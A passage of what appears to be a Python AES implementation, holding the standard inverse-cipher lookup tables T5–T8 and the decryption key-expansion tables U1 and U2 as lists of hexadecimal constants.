0x89898009, 0x0d0d171a, 0xbfbfda65, 0xe6e631d7, 0x4242c684, 0x6868b8d0, 0x4141c382, 0x9999b029, 0x2d2d775a, 0x0f0f111e, 0xb0b0cb7b, 0x5454fca8, 0xbbbbd66d, 0x16163a2c ]
# Transformations for decryption
T5 = [ 0x51f4a750, 0x7e416553, 0x1a17a4c3, 0x3a275e96, 0x3bab6bcb, 0x1f9d45f1, 0xacfa58ab, 0x4be30393, 0x2030fa55, 0xad766df6, 0x88cc7691, 0xf5024c25, 0x4fe5d7fc, 0xc52acbd7, 0x26354480, 0xb562a38f, 0xdeb15a49, 0x25ba1b67, 0x45ea0e98, 0x5dfec0e1, 0xc32f7502, 0x814cf012, 0x8d4697a3, 0x6bd3f9c6, 0x038f5fe7, 0x15929c95, 0xbf6d7aeb, 0x955259da, 0xd4be832d, 0x587421d3, 0x49e06929, 0x8ec9c844, 0x75c2896a, 0xf48e7978, 0x99583e6b, 0x27b971dd, 0xbee14fb6, 0xf088ad17, 0xc920ac66, 0x7dce3ab4, 0x63df4a18, 0xe51a3182, 0x97513360, 0x62537f45, 0xb16477e0, 0xbb6bae84, 0xfe81a01c, 0xf9082b94, 0x70486858, 0x8f45fd19, 0x94de6c87, 0x527bf8b7, 0xab73d323, 0x724b02e2, 0xe31f8f57, 0x6655ab2a, 0xb2eb2807, 0x2fb5c203, 0x86c57b9a, 0xd33708a5, 0x302887f2, 0x23bfa5b2, 0x02036aba, 0xed16825c, 0x8acf1c2b, 0xa779b492, 0xf307f2f0, 0x4e69e2a1, 0x65daf4cd, 0x0605bed5, 0xd134621f, 0xc4a6fe8a, 0x342e539d, 0xa2f355a0, 0x058ae132, 0xa4f6eb75, 0x0b83ec39, 0x4060efaa, 0x5e719f06, 0xbd6e1051, 0x3e218af9, 0x96dd063d, 0xdd3e05ae, 0x4de6bd46, 0x91548db5, 0x71c45d05, 0x0406d46f, 0x605015ff, 0x1998fb24, 0xd6bde997, 0x894043cc, 0x67d99e77, 0xb0e842bd, 0x07898b88, 0xe7195b38, 0x79c8eedb, 0xa17c0a47, 0x7c420fe9, 0xf8841ec9, 0x00000000, 0x09808683, 0x322bed48, 0x1e1170ac, 0x6c5a724e, 0xfd0efffb, 0x0f853856, 0x3daed51e, 0x362d3927, 0x0a0fd964, 0x685ca621, 0x9b5b54d1, 0x24362e3a, 0x0c0a67b1, 0x9357e70f, 0xb4ee96d2, 0x1b9b919e, 0x80c0c54f, 0x61dc20a2, 0x5a774b69, 0x1c121a16, 0xe293ba0a, 0xc0a02ae5, 0x3c22e043, 0x121b171d, 0x0e090d0b, 0xf28bc7ad, 0x2db6a8b9, 0x141ea9c8, 0x57f11985, 0xaf75074c, 0xee99ddbb, 0xa37f60fd, 0xf701269f, 0x5c72f5bc, 0x44663bc5, 0x5bfb7e34, 0x8b432976, 0xcb23c6dc, 0xb6edfc68, 0xb8e4f163, 0xd731dcca, 0x42638510, 0x13972240, 0x84c61120, 0x854a247d, 0xd2bb3df8, 0xaef93211, 0xc729a16d, 0x1d9e2f4b, 0xdcb230f3, 0x0d8652ec, 0x77c1e3d0, 0x2bb3166c, 0xa970b999, 0x119448fa, 0x47e96422, 0xa8fc8cc4, 0xa0f03f1a, 0x567d2cd8, 0x223390ef, 0x87494ec7, 0xd938d1c1, 0x8ccaa2fe, 0x98d40b36, 0xa6f581cf, 0xa57ade28, 
0xdab78e26, 0x3fadbfa4, 0x2c3a9de4, 0x5078920d, 0x6a5fcc9b, 0x547e4662, 0xf68d13c2, 0x90d8b8e8, 0x2e39f75e, 0x82c3aff5, 0x9f5d80be, 0x69d0937c, 0x6fd52da9, 0xcf2512b3, 0xc8ac993b, 0x10187da7, 0xe89c636e, 0xdb3bbb7b, 0xcd267809, 0x6e5918f4, 0xec9ab701, 0x834f9aa8, 0xe6956e65, 0xaaffe67e, 0x21bccf08, 0xef15e8e6, 0xbae79bd9, 0x4a6f36ce, 0xea9f09d4, 0x29b07cd6, 0x31a4b2af, 0x2a3f2331, 0xc6a59430, 0x35a266c0, 0x744ebc37, 0xfc82caa6, 0xe090d0b0, 0x33a7d815, 0xf104984a, 0x41ecdaf7, 0x7fcd500e, 0x1791f62f, 0x764dd68d, 0x43efb04d, 0xccaa4d54, 0xe49604df, 0x9ed1b5e3, 0x4c6a881b, 0xc12c1fb8, 0x4665517f, 0x9d5eea04, 0x018c355d, 0xfa877473, 0xfb0b412e, 0xb3671d5a, 0x92dbd252, 0xe9105633, 0x6dd64713, 0x9ad7618c, 0x37a10c7a, 0x59f8148e, 0xeb133c89, 0xcea927ee, 0xb761c935, 0xe11ce5ed, 0x7a47b13c, 0x9cd2df59, 0x55f2733f, 0x1814ce79, 0x73c737bf, 0x53f7cdea, 0x5ffdaa5b, 0xdf3d6f14, 0x7844db86, 0xcaaff381, 0xb968c43e, 0x3824342c, 0xc2a3405f, 0x161dc372, 0xbce2250c, 0x283c498b, 0xff0d9541, 0x39a80171, 0x080cb3de, 0xd8b4e49c, 0x6456c190, 0x7bcb8461, 0xd532b670, 0x486c5c74, 0xd0b85742 ]
T6 = [ 0x5051f4a7, 0x537e4165, 0xc31a17a4, 0x963a275e, 0xcb3bab6b, 0xf11f9d45, 0xabacfa58, 0x934be303, 0x552030fa, 0xf6ad766d, 0x9188cc76, 0x25f5024c, 0xfc4fe5d7, 0xd7c52acb, 0x80263544, 0x8fb562a3, 0x49deb15a, 0x6725ba1b, 0x9845ea0e, 0xe15dfec0, 0x02c32f75, 0x12814cf0, 0xa38d4697, 0xc66bd3f9, 0xe7038f5f, 0x9515929c, 0xebbf6d7a, 0xda955259, 0x2dd4be83, 0xd3587421, 0x2949e069, 0x448ec9c8, 0x6a75c289, 0x78f48e79, 0x6b99583e, 0xdd27b971, 0xb6bee14f, 0x17f088ad, 0x66c920ac, 0xb47dce3a, 0x1863df4a, 0x82e51a31, 0x60975133, 0x4562537f, 0xe0b16477, 0x84bb6bae, 0x1cfe81a0, 0x94f9082b, 0x58704868, 0x198f45fd, 0x8794de6c, 0xb7527bf8, 0x23ab73d3, 0xe2724b02, 0x57e31f8f, 0x2a6655ab, 0x07b2eb28, 0x032fb5c2, 0x9a86c57b, 0xa5d33708, 0xf2302887, 0xb223bfa5, 0xba02036a, 0x5ced1682, 0x2b8acf1c, 0x92a779b4, 0xf0f307f2, 0xa14e69e2, 0xcd65daf4, 0xd50605be, 0x1fd13462, 0x8ac4a6fe, 0x9d342e53, 0xa0a2f355, 0x32058ae1, 0x75a4f6eb, 0x390b83ec, 0xaa4060ef, 0x065e719f, 0x51bd6e10, 0xf93e218a, 0x3d96dd06, 0xaedd3e05, 0x464de6bd, 0xb591548d, 0x0571c45d, 0x6f0406d4, 0xff605015, 0x241998fb, 0x97d6bde9, 0xcc894043, 0x7767d99e, 0xbdb0e842, 0x8807898b, 0x38e7195b, 0xdb79c8ee, 0x47a17c0a, 0xe97c420f, 0xc9f8841e, 0x00000000, 0x83098086, 0x48322bed, 0xac1e1170, 0x4e6c5a72, 0xfbfd0eff, 0x560f8538, 0x1e3daed5, 0x27362d39, 0x640a0fd9, 0x21685ca6, 0xd19b5b54, 0x3a24362e, 0xb10c0a67, 0x0f9357e7, 0xd2b4ee96, 0x9e1b9b91, 0x4f80c0c5, 0xa261dc20, 0x695a774b, 0x161c121a, 0x0ae293ba, 0xe5c0a02a, 0x433c22e0, 0x1d121b17, 0x0b0e090d, 0xadf28bc7, 0xb92db6a8, 0xc8141ea9, 0x8557f119, 0x4caf7507, 0xbbee99dd, 0xfda37f60, 0x9ff70126, 0xbc5c72f5, 0xc544663b, 0x345bfb7e, 0x768b4329, 0xdccb23c6, 0x68b6edfc, 0x63b8e4f1, 0xcad731dc, 0x10426385, 0x40139722, 0x2084c611, 0x7d854a24, 0xf8d2bb3d, 0x11aef932, 0x6dc729a1, 0x4b1d9e2f, 0xf3dcb230, 0xec0d8652, 0xd077c1e3, 0x6c2bb316, 0x99a970b9, 0xfa119448, 0x2247e964, 0xc4a8fc8c, 0x1aa0f03f, 0xd8567d2c, 0xef223390, 0xc787494e, 0xc1d938d1, 0xfe8ccaa2, 0x3698d40b, 0xcfa6f581, 0x28a57ade, 
0x26dab78e, 0xa43fadbf, 0xe42c3a9d, 0x0d507892, 0x9b6a5fcc, 0x62547e46, 0xc2f68d13, 0xe890d8b8, 0x5e2e39f7, 0xf582c3af, 0xbe9f5d80, 0x7c69d093, 0xa96fd52d, 0xb3cf2512, 0x3bc8ac99, 0xa710187d, 0x6ee89c63, 0x7bdb3bbb, 0x09cd2678, 0xf46e5918, 0x01ec9ab7, 0xa8834f9a, 0x65e6956e, 0x7eaaffe6, 0x0821bccf, 0xe6ef15e8, 0xd9bae79b, 0xce4a6f36, 0xd4ea9f09, 0xd629b07c, 0xaf31a4b2, 0x312a3f23, 0x30c6a594, 0xc035a266, 0x37744ebc, 0xa6fc82ca, 0xb0e090d0, 0x1533a7d8, 0x4af10498, 0xf741ecda, 0x0e7fcd50, 0x2f1791f6, 0x8d764dd6, 0x4d43efb0, 0x54ccaa4d, 0xdfe49604, 0xe39ed1b5, 0x1b4c6a88, 0xb8c12c1f, 0x7f466551, 0x049d5eea, 0x5d018c35, 0x73fa8774, 0x2efb0b41, 0x5ab3671d, 0x5292dbd2, 0x33e91056, 0x136dd647, 0x8c9ad761, 0x7a37a10c, 0x8e59f814, 0x89eb133c, 0xeecea927, 0x35b761c9, 0xede11ce5, 0x3c7a47b1, 0x599cd2df, 0x3f55f273, 0x791814ce, 0xbf73c737, 0xea53f7cd, 0x5b5ffdaa, 0x14df3d6f, 0x867844db, 0x81caaff3, 0x3eb968c4, 0x2c382434, 0x5fc2a340, 0x72161dc3, 0x0cbce225, 0x8b283c49, 0x41ff0d95, 0x7139a801, 0xde080cb3, 0x9cd8b4e4, 0x906456c1, 0x617bcb84, 0x70d532b6, 0x74486c5c, 0x42d0b857 ]
T7 = [ 0xa75051f4, 0x65537e41, 0xa4c31a17, 0x5e963a27, 0x6bcb3bab, 0x45f11f9d, 0x58abacfa, 0x03934be3, 0xfa552030, 0x6df6ad76, 0x769188cc, 0x4c25f502, 0xd7fc4fe5, 0xcbd7c52a, 0x44802635, 0xa38fb562, 0x5a49deb1, 0x1b6725ba, 0x0e9845ea, 0xc0e15dfe, 0x7502c32f, 0xf012814c, 0x97a38d46, 0xf9c66bd3, 0x5fe7038f, 0x9c951592, 0x7aebbf6d, 0x59da9552, 0x832dd4be, 0x21d35874, 0x692949e0, 0xc8448ec9, 0x896a75c2, 0x7978f48e, 0x3e6b9958, 0x71dd27b9, 0x4fb6bee1, 0xad17f088, 0xac66c920, 0x3ab47dce, 0x4a1863df, 0x3182e51a, 0x33609751, 0x7f456253, 0x77e0b164, 0xae84bb6b, 0xa01cfe81, 0x2b94f908, 0x68587048, 0xfd198f45, 0x6c8794de, 0xf8b7527b, 0xd323ab73, 0x02e2724b, 0x8f57e31f, 0xab2a6655, 0x2807b2eb, 0xc2032fb5, 0x7b9a86c5, 0x08a5d337, 0x87f23028, 0xa5b223bf, 0x6aba0203, 0x825ced16, 0x1c2b8acf, 0xb492a779, 0xf2f0f307, 0xe2a14e69, 0xf4cd65da, 0xbed50605, 0x621fd134, 0xfe8ac4a6, 0x539d342e, 0x55a0a2f3, 0xe132058a, 0xeb75a4f6, 0xec390b83, 0xefaa4060, 0x9f065e71, 0x1051bd6e, 0x8af93e21, 0x063d96dd, 0x05aedd3e, 0xbd464de6, 0x8db59154, 0x5d0571c4, 0xd46f0406, 0x15ff6050, 0xfb241998, 0xe997d6bd, 0x43cc8940, 0x9e7767d9, 0x42bdb0e8, 0x8b880789, 0x5b38e719, 0xeedb79c8, 0x0a47a17c, 0x0fe97c42, 0x1ec9f884, 0x00000000, 0x86830980, 0xed48322b, 0x70ac1e11, 0x724e6c5a, 0xfffbfd0e, 0x38560f85, 0xd51e3dae, 0x3927362d, 0xd9640a0f, 0xa621685c, 0x54d19b5b, 0x2e3a2436, 0x67b10c0a, 0xe70f9357, 0x96d2b4ee, 0x919e1b9b, 0xc54f80c0, 0x20a261dc, 0x4b695a77, 0x1a161c12, 0xba0ae293, 0x2ae5c0a0, 0xe0433c22, 0x171d121b, 0x0d0b0e09, 0xc7adf28b, 0xa8b92db6, 0xa9c8141e, 0x198557f1, 0x074caf75, 0xddbbee99, 0x60fda37f, 0x269ff701, 0xf5bc5c72, 0x3bc54466, 0x7e345bfb, 0x29768b43, 0xc6dccb23, 0xfc68b6ed, 0xf163b8e4, 0xdccad731, 0x85104263, 0x22401397, 0x112084c6, 0x247d854a, 0x3df8d2bb, 0x3211aef9, 0xa16dc729, 0x2f4b1d9e, 0x30f3dcb2, 0x52ec0d86, 0xe3d077c1, 0x166c2bb3, 0xb999a970, 0x48fa1194, 0x642247e9, 0x8cc4a8fc, 0x3f1aa0f0, 0x2cd8567d, 0x90ef2233, 0x4ec78749, 0xd1c1d938, 0xa2fe8cca, 0x0b3698d4, 0x81cfa6f5, 0xde28a57a, 
0x8e26dab7, 0xbfa43fad, 0x9de42c3a, 0x920d5078, 0xcc9b6a5f, 0x4662547e, 0x13c2f68d, 0xb8e890d8, 0xf75e2e39, 0xaff582c3, 0x80be9f5d, 0x937c69d0, 0x2da96fd5, 0x12b3cf25, 0x993bc8ac, 0x7da71018, 0x636ee89c, 0xbb7bdb3b, 0x7809cd26, 0x18f46e59, 0xb701ec9a, 0x9aa8834f, 0x6e65e695, 0xe67eaaff, 0xcf0821bc, 0xe8e6ef15, 0x9bd9bae7, 0x36ce4a6f, 0x09d4ea9f, 0x7cd629b0, 0xb2af31a4, 0x23312a3f, 0x9430c6a5, 0x66c035a2, 0xbc37744e, 0xcaa6fc82, 0xd0b0e090, 0xd81533a7, 0x984af104, 0xdaf741ec, 0x500e7fcd, 0xf62f1791, 0xd68d764d, 0xb04d43ef, 0x4d54ccaa, 0x04dfe496, 0xb5e39ed1, 0x881b4c6a, 0x1fb8c12c, 0x517f4665, 0xea049d5e, 0x355d018c, 0x7473fa87, 0x412efb0b, 0x1d5ab367, 0xd25292db, 0x5633e910, 0x47136dd6, 0x618c9ad7, 0x0c7a37a1, 0x148e59f8, 0x3c89eb13, 0x27eecea9, 0xc935b761, 0xe5ede11c, 0xb13c7a47, 0xdf599cd2, 0x733f55f2, 0xce791814, 0x37bf73c7, 0xcdea53f7, 0xaa5b5ffd, 0x6f14df3d, 0xdb867844, 0xf381caaf, 0xc43eb968, 0x342c3824, 0x405fc2a3, 0xc372161d, 0x250cbce2, 0x498b283c, 0x9541ff0d, 0x017139a8, 0xb3de080c, 0xe49cd8b4, 0xc1906456, 0x84617bcb, 0xb670d532, 0x5c74486c, 0x5742d0b8 ]
T8 = [ 0xf4a75051, 0x4165537e, 0x17a4c31a, 0x275e963a, 0xab6bcb3b, 0x9d45f11f, 0xfa58abac, 0xe303934b, 0x30fa5520, 0x766df6ad, 0xcc769188, 0x024c25f5, 0xe5d7fc4f, 0x2acbd7c5, 0x35448026, 0x62a38fb5, 0xb15a49de, 0xba1b6725, 0xea0e9845, 0xfec0e15d, 0x2f7502c3, 0x4cf01281, 0x4697a38d, 0xd3f9c66b, 0x8f5fe703, 0x929c9515, 0x6d7aebbf, 0x5259da95, 0xbe832dd4, 0x7421d358, 0xe0692949, 0xc9c8448e, 0xc2896a75, 0x8e7978f4, 0x583e6b99, 0xb971dd27, 0xe14fb6be, 0x88ad17f0, 0x20ac66c9, 0xce3ab47d, 0xdf4a1863, 0x1a3182e5, 0x51336097, 0x537f4562, 0x6477e0b1, 0x6bae84bb, 0x81a01cfe, 0x082b94f9, 0x48685870, 0x45fd198f, 0xde6c8794, 0x7bf8b752, 0x73d323ab, 0x4b02e272, 0x1f8f57e3, 0x55ab2a66, 0xeb2807b2, 0xb5c2032f, 0xc57b9a86, 0x3708a5d3, 0x2887f230, 0xbfa5b223, 0x036aba02, 0x16825ced, 0xcf1c2b8a, 0x79b492a7, 0x07f2f0f3, 0x69e2a14e, 0xdaf4cd65, 0x05bed506, 0x34621fd1, 0xa6fe8ac4, 0x2e539d34, 0xf355a0a2, 0x8ae13205, 0xf6eb75a4, 0x83ec390b, 0x60efaa40, 0x719f065e, 0x6e1051bd, 0x218af93e, 0xdd063d96, 0x3e05aedd, 0xe6bd464d, 0x548db591, 0xc45d0571, 0x06d46f04, 0x5015ff60, 0x98fb2419, 0xbde997d6, 0x4043cc89, 0xd99e7767, 0xe842bdb0, 0x898b8807, 0x195b38e7, 0xc8eedb79, 0x7c0a47a1, 0x420fe97c, 0x841ec9f8, 0x00000000, 0x80868309, 0x2bed4832, 0x1170ac1e, 0x5a724e6c, 0x0efffbfd, 0x8538560f, 0xaed51e3d, 0x2d392736, 0x0fd9640a, 0x5ca62168, 0x5b54d19b, 0x362e3a24, 0x0a67b10c, 0x57e70f93, 0xee96d2b4, 0x9b919e1b, 0xc0c54f80, 0xdc20a261, 0x774b695a, 0x121a161c, 0x93ba0ae2, 0xa02ae5c0, 0x22e0433c, 0x1b171d12, 0x090d0b0e, 0x8bc7adf2, 0xb6a8b92d, 0x1ea9c814, 0xf1198557, 0x75074caf, 0x99ddbbee, 0x7f60fda3, 0x01269ff7, 0x72f5bc5c, 0x663bc544, 0xfb7e345b, 0x4329768b, 0x23c6dccb, 0xedfc68b6, 0xe4f163b8, 0x31dccad7, 0x63851042, 0x97224013, 0xc6112084, 0x4a247d85, 0xbb3df8d2, 0xf93211ae, 0x29a16dc7, 0x9e2f4b1d, 0xb230f3dc, 0x8652ec0d, 0xc1e3d077, 0xb3166c2b, 0x70b999a9, 0x9448fa11, 0xe9642247, 0xfc8cc4a8, 0xf03f1aa0, 0x7d2cd856, 0x3390ef22, 0x494ec787, 0x38d1c1d9, 0xcaa2fe8c, 0xd40b3698, 0xf581cfa6, 0x7ade28a5, 
0xb78e26da, 0xadbfa43f, 0x3a9de42c, 0x78920d50, 0x5fcc9b6a, 0x7e466254, 0x8d13c2f6, 0xd8b8e890, 0x39f75e2e, 0xc3aff582, 0x5d80be9f, 0xd0937c69, 0xd52da96f, 0x2512b3cf, 0xac993bc8, 0x187da710, 0x9c636ee8, 0x3bbb7bdb, 0x267809cd, 0x5918f46e, 0x9ab701ec, 0x4f9aa883, 0x956e65e6, 0xffe67eaa, 0xbccf0821, 0x15e8e6ef, 0xe79bd9ba, 0x6f36ce4a, 0x9f09d4ea, 0xb07cd629, 0xa4b2af31, 0x3f23312a, 0xa59430c6, 0xa266c035, 0x4ebc3774, 0x82caa6fc, 0x90d0b0e0, 0xa7d81533, 0x04984af1, 0xecdaf741, 0xcd500e7f, 0x91f62f17, 0x4dd68d76, 0xefb04d43, 0xaa4d54cc, 0x9604dfe4, 0xd1b5e39e, 0x6a881b4c, 0x2c1fb8c1, 0x65517f46, 0x5eea049d, 0x8c355d01, 0x877473fa, 0x0b412efb, 0x671d5ab3, 0xdbd25292, 0x105633e9, 0xd647136d, 0xd7618c9a, 0xa10c7a37, 0xf8148e59, 0x133c89eb, 0xa927eece, 0x61c935b7, 0x1ce5ede1, 0x47b13c7a, 0xd2df599c, 0xf2733f55, 0x14ce7918, 0xc737bf73, 0xf7cdea53, 0xfdaa5b5f, 0x3d6f14df, 0x44db8678, 0xaff381ca, 0x68c43eb9, 0x24342c38, 0xa3405fc2, 0x1dc37216, 0xe2250cbc, 0x3c498b28, 0x0d9541ff, 0xa8017139, 0x0cb3de08, 0xb4e49cd8, 0x56c19064, 0xcb84617b, 0x32b670d5, 0x6c5c7448, 0xb85742d0 ]
# Transformations for decryption key expansion
U1 = [ 0x00000000, 0x0e090d0b, 0x1c121a16, 0x121b171d, 0x3824342c, 0x362d3927, 0x24362e3a, 0x2a3f2331, 0x70486858, 0x7e416553, 0x6c5a724e, 0x62537f45, 0x486c5c74, 0x4665517f, 0x547e4662, 0x5a774b69, 0xe090d0b0, 0xee99ddbb, 0xfc82caa6, 0xf28bc7ad, 0xd8b4e49c, 0xd6bde997, 0xc4a6fe8a, 0xcaaff381, 0x90d8b8e8, 0x9ed1b5e3, 0x8ccaa2fe, 0x82c3aff5, 0xa8fc8cc4, 0xa6f581cf, 0xb4ee96d2, 0xbae79bd9, 0xdb3bbb7b, 0xd532b670, 0xc729a16d, 0xc920ac66, 0xe31f8f57, 0xed16825c, 0xff0d9541, 0xf104984a, 0xab73d323, 0xa57ade28, 0xb761c935, 0xb968c43e, 0x9357e70f, 0x9d5eea04, 0x8f45fd19, 0x814cf012, 0x3bab6bcb, 0x35a266c0, 0x27b971dd, 0x29b07cd6, 0x038f5fe7, 0x0d8652ec, 0x1f9d45f1, 0x119448fa, 0x4be30393, 0x45ea0e98, 0x57f11985, 0x59f8148e, 0x73c737bf, 0x7dce3ab4, 0x6fd52da9, 0x61dc20a2, 0xad766df6, 0xa37f60fd, 0xb16477e0, 0xbf6d7aeb, 0x955259da, 0x9b5b54d1, 0x894043cc, 0x87494ec7, 0xdd3e05ae, 0xd33708a5, 0xc12c1fb8, 0xcf2512b3, 0xe51a3182, 0xeb133c89, 0xf9082b94, 0xf701269f, 0x4de6bd46, 0x43efb04d, 0x51f4a750, 0x5ffdaa5b, 0x75c2896a, 0x7bcb8461, 0x69d0937c, 0x67d99e77, 0x3daed51e, 0x33a7d815, 0x21bccf08, 0x2fb5c203, 0x058ae132, 0x0b83ec39, 0x1998fb24, 0x1791f62f, 0x764dd68d, 0x7844db86, 0x6a5fcc9b, 0x6456c190, 0x4e69e2a1, 0x4060efaa, 0x527bf8b7, 0x5c72f5bc, 0x0605bed5, 0x080cb3de, 0x1a17a4c3, 0x141ea9c8, 0x3e218af9, 0x302887f2, 0x223390ef, 0x2c3a9de4, 0x96dd063d, 0x98d40b36, 0x8acf1c2b, 0x84c61120, 0xaef93211, 0xa0f03f1a, 0xb2eb2807, 0xbce2250c, 0xe6956e65, 0xe89c636e, 0xfa877473, 0xf48e7978, 0xdeb15a49, 0xd0b85742, 0xc2a3405f, 0xccaa4d54, 0x41ecdaf7, 0x4fe5d7fc, 0x5dfec0e1, 0x53f7cdea, 0x79c8eedb, 0x77c1e3d0, 0x65daf4cd, 0x6bd3f9c6, 0x31a4b2af, 0x3fadbfa4, 0x2db6a8b9, 0x23bfa5b2, 0x09808683, 0x07898b88, 0x15929c95, 0x1b9b919e, 0xa17c0a47, 0xaf75074c, 0xbd6e1051, 0xb3671d5a, 0x99583e6b, 0x97513360, 0x854a247d, 0x8b432976, 0xd134621f, 0xdf3d6f14, 0xcd267809, 0xc32f7502, 0xe9105633, 0xe7195b38, 0xf5024c25, 0xfb0b412e, 0x9ad7618c, 0x94de6c87, 0x86c57b9a, 0x88cc7691, 0xa2f355a0, 0xacfa58ab, 
0xbee14fb6, 0xb0e842bd, 0xea9f09d4, 0xe49604df, 0xf68d13c2, 0xf8841ec9, 0xd2bb3df8, 0xdcb230f3, 0xcea927ee, 0xc0a02ae5, 0x7a47b13c, 0x744ebc37, 0x6655ab2a, 0x685ca621, 0x42638510, 0x4c6a881b, 0x5e719f06, 0x5078920d, 0x0a0fd964, 0x0406d46f, 0x161dc372, 0x1814ce79, 0x322bed48, 0x3c22e043, 0x2e39f75e, 0x2030fa55, 0xec9ab701, 0xe293ba0a, 0xf088ad17, 0xfe81a01c, 0xd4be832d, 0xdab78e26, 0xc8ac993b, 0xc6a59430, 0x9cd2df59, 0x92dbd252, 0x80c0c54f, 0x8ec9c844, 0xa4f6eb75, 0xaaffe67e, 0xb8e4f163, 0xb6edfc68, 0x0c0a67b1, 0x02036aba, 0x10187da7, 0x1e1170ac, 0x342e539d, 0x3a275e96, 0x283c498b, 0x26354480, 0x7c420fe9, 0x724b02e2, 0x605015ff, 0x6e5918f4, 0x44663bc5, 0x4a6f36ce, 0x587421d3, 0x567d2cd8, 0x37a10c7a, 0x39a80171, 0x2bb3166c, 0x25ba1b67, 0x0f853856, 0x018c355d, 0x13972240, 0x1d9e2f4b, 0x47e96422, 0x49e06929, 0x5bfb7e34, 0x55f2733f, 0x7fcd500e, 0x71c45d05, 0x63df4a18, 0x6dd64713, 0xd731dcca, 0xd938d1c1, 0xcb23c6dc, 0xc52acbd7, 0xef15e8e6, 0xe11ce5ed, 0xf307f2f0, 0xfd0efffb, 0xa779b492, 0xa970b999, 0xbb6bae84, 0xb562a38f, 0x9f5d80be, 0x91548db5, 0x834f9aa8, 0x8d4697a3 ]
U2 = [ 0x00000000, 0x0b0e090d, 0x161c121a, 0x1d121b17, 0x2c382434, 0x27362d39, 0x3a24362e, 0x312a3f23, 0x58704868, 0x537e4165, 0x4e6c5a72, 0x4562537f, 0x74486c5c, 0x7f466551, 0x62547e46, 0x695a774b, 0xb0e090d0, 0xbbee99dd, 0xa6fc82ca, 0xadf28bc7, 0x9cd8b4e4, 0x97d6bde9, 0x8ac4a6fe, 0x81caaff3, 0xe890d8b8, 0xe39ed1b5, 0xfe8ccaa2, 0xf582c3af, 0xc4a8fc8c, 0xcfa6f581, 0xd2b4ee96, 0xd9bae79b, 0x7bdb3bbb, 0x70d532b6, 0x6dc729a1, 0x66c920ac, 0x57e31f8f, 0x5ced1682, 0x41ff0d95, 0x4af10498, 0x23ab73d3, 0x28a57ade, 0x35b761c9, 0x3eb968c4, 0x0f9357e7, 0x049d5eea, 0x198f45fd, 0x12814cf0, 0xcb3bab6b, 0xc035a266, 0xdd27b971, 0xd629b07c, 0xe7038f5f, 0xec0d8652, 0xf11f9d45, 0xfa119448, 0x934be303, 0x9845ea0e, 0x8557f119, 0x8e59f814, 0xbf73c737, 0xb47dce3a, 0xa96fd52d, 0xa261dc20, 0xf6ad766d, 0xfda37f60, 0xe0b16477, 0xebbf6d7a, 0xda955259, 0xd19b5b54, 0xcc894043, 0xc787494e, 0xaedd3e05, 0xa5d33708, 0xb8c12c1f, 0xb3cf2512, 0x82e51a31, 0x89eb133c, 0x94f9082b, 0x9ff70126, 0x464de6bd, 0x4d43efb0, 0x5051f4a7, 0x5b5ffdaa, 0x6a75c289, 0x617bcb84, 0x7c69d093, 0x7767d99e, 0x1e3daed5, 0x1533a7d8, 0x0821bccf, 0x032fb5c2, 0x32058ae1, 0x390b83ec, 0x241998fb, 0x2f1791f6, 0x8d764dd6, 0x867844db, 0x9b6a5fcc, 0x906456c1, 0xa14e69e2, 0xaa4060ef, 0xb7527bf8, 0xbc5c72f5, 0xd50605be, 0xde080cb3, 0xc31a17a4, 0xc8141ea9, 0xf93e218a, 0xf2302887, 0xef223390, 0xe42c3a9d, 0x3d96dd06, 0x3698d40b, 0x2b8acf1c, 0x2084c611, 0x11aef932, 0x1aa0f03f, 0x07b2eb28, 0x0cbce225, 0x65e6956e, 0x6ee89c63, 0x73fa8774, 0x78f48e79, 0x49deb15a, 0x42d0b857, 0x5fc2a340, 0x54ccaa4d, 0xf741ecda, 0xfc4fe5d7, 0xe15dfec0, 0xea53f7cd, 0xdb79c8ee, 0xd077c1e3, 0xcd65daf4, 0xc66bd3f9, 0xaf31a4b2, 0xa43fadbf, 0xb92db6a8, 0xb223bfa5, 0x83098086, 0x8807898b, 0x9515929c, 0x9e1b9b91, 0x47a17c0a, 0x4caf7507, 0x51bd6e10, 0x5ab3671d, 0x6b99583e, 0x60975133, 0x7d854a24, 0x768b4329, 0x1fd13462, 0x14df3d6f, 0x09cd2678, 0x02c32f75, 0x33e91056, 0x38e7195b, 0x25f5024c, 0x2efb0b41, 0x8c9ad761, 0x8794de6c, 0x9a86c57b, 0x9188cc76, 0xa0a2f355, 0xabacfa58, 
0xb6bee14f, 0xbdb0e842, 0xd4ea9f09, 0xdfe49604, 0xc2f68d13, 0xc9f8841e, 0xf8d2bb3d, 0xf3dcb230, 0xeecea927, 0xe5c0a02a, 0x3c7a47b1, 0x37744ebc, 0x2a6655ab, 0x21685ca6, 0x10426385, 0x1b4c6a88, 0x065e719f, 0x0d507892, 0x640a0fd9, 0x6f0406d4, 0x72161dc3, 0x791814ce, 0x48322bed, 0x433c22e0, 0x5e2e39f7, 0x552030fa, 0x01ec9ab7, 0x0ae293ba, 0x17f088ad, 0x1cfe81a0, 0x2dd4be83, 0x26dab78e, 0x3bc8ac99, 0x30c6a594, 0x599cd2df, 0x5292dbd2, 0x4f80c0c5, 0x448ec9c8, 0x75a4f6eb, 0x7eaaffe6, 0x63b8e4f1, 0x68b6edfc, 0xb10c0a67, 0xba02036a, 0xa710187d, 0xac1e1170, 0x9d342e53, 0x963a275e, 0x8b283c49, 0x80263544, 0xe97c420f, 0xe2724b02, 0xff605015, 0xf46e5918, 0xc544663b, 0xce4a6f36, 0xd3587421, 0xd8567d2c, 0x7a37a10c, 0x7139a801, 0x6c2bb316, 0x6725ba1b, 0x560f8538, 0x5d018c35, 0x40139722, 0x4b1d9e2f, 0x2247e964, 0x2949e069, 0x345bfb7e, 0x3f55f273, 0x0e7fcd50, 0x0571c45d, 0x1863df4a, 0x136dd647, 0xcad731dc, 0xc1d938d1, 0xdccb23c6, 0xd7c52acb, 0xe6ef15e8, 0xede11ce5, 0xf0f307f2, 0xfbfd0eff, 0x92a779b4, 0x99a970b9, 0x84bb6bae, 0x8fb562a3, 0xbe9f5d80, 0xb591548d, 0xa8834f9a, 0xa38d4697 ]
